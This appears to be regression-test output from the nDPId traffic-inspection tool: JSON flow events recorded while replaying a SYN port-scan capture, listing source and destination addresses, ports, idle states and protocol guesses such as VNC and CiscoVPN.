+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5901,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1805,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1083,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1083,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5903,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55056,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5904,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5903,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55056,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5904,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5906,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1029,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5907,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 